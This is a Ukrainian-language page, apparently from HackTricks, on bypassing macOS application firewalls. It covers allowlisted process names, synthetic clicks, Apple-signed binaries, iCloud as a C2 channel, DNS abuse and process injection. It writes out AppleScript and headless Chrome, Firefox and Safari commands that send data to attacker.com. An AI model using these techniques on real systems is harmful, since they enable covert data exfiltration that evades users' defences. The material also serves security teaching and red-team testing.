macOS обхід брандмауерів
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Знайдені техніки
Наступні техніки були виявлені як працюючі в деяких додатках брандмауера macOS.
Зловживання іменами у білому списку
- Наприклад, викликати шкідливе ПЗ з іменами відомих процесів macOS, таких як
launchd
Синтетичний клік
- Якщо брандмауер запитує дозволу у користувача, змусьте шкідливе ПЗ натиснути на дозволити
Використання підписаних Apple бінарників
- Як
curl
, але також інші, такі якwhois
Відомі домени Apple
Брандмауер може дозволяти з'єднання з відомими доменами Apple, такими як apple.com
або icloud.com
. І iCloud може бути використаний як C2.
Загальний обхід
Деякі ідеї для спроби обійти брандмауери
Перевірка дозволеного трафіку
Знання дозволеного трафіку допоможе вам виявити потенційно включені в білий список домени або які програми мають доступ до них.
lsof -i TCP -sTCP:ESTABLISHED
Зловживання DNS
DNS-резолюції виконуються через mdnsreponder
підписаний додаток, який, ймовірно, буде дозволено контактувати з DNS-серверами.
.png)
Через браузерні додатки
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Через ін'єкції процесів
Якщо ви можете ін'єктувати код у процес, який має право підключатися до будь-якого сервера, ви можете обійти захист брандмауера:
Посилання
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.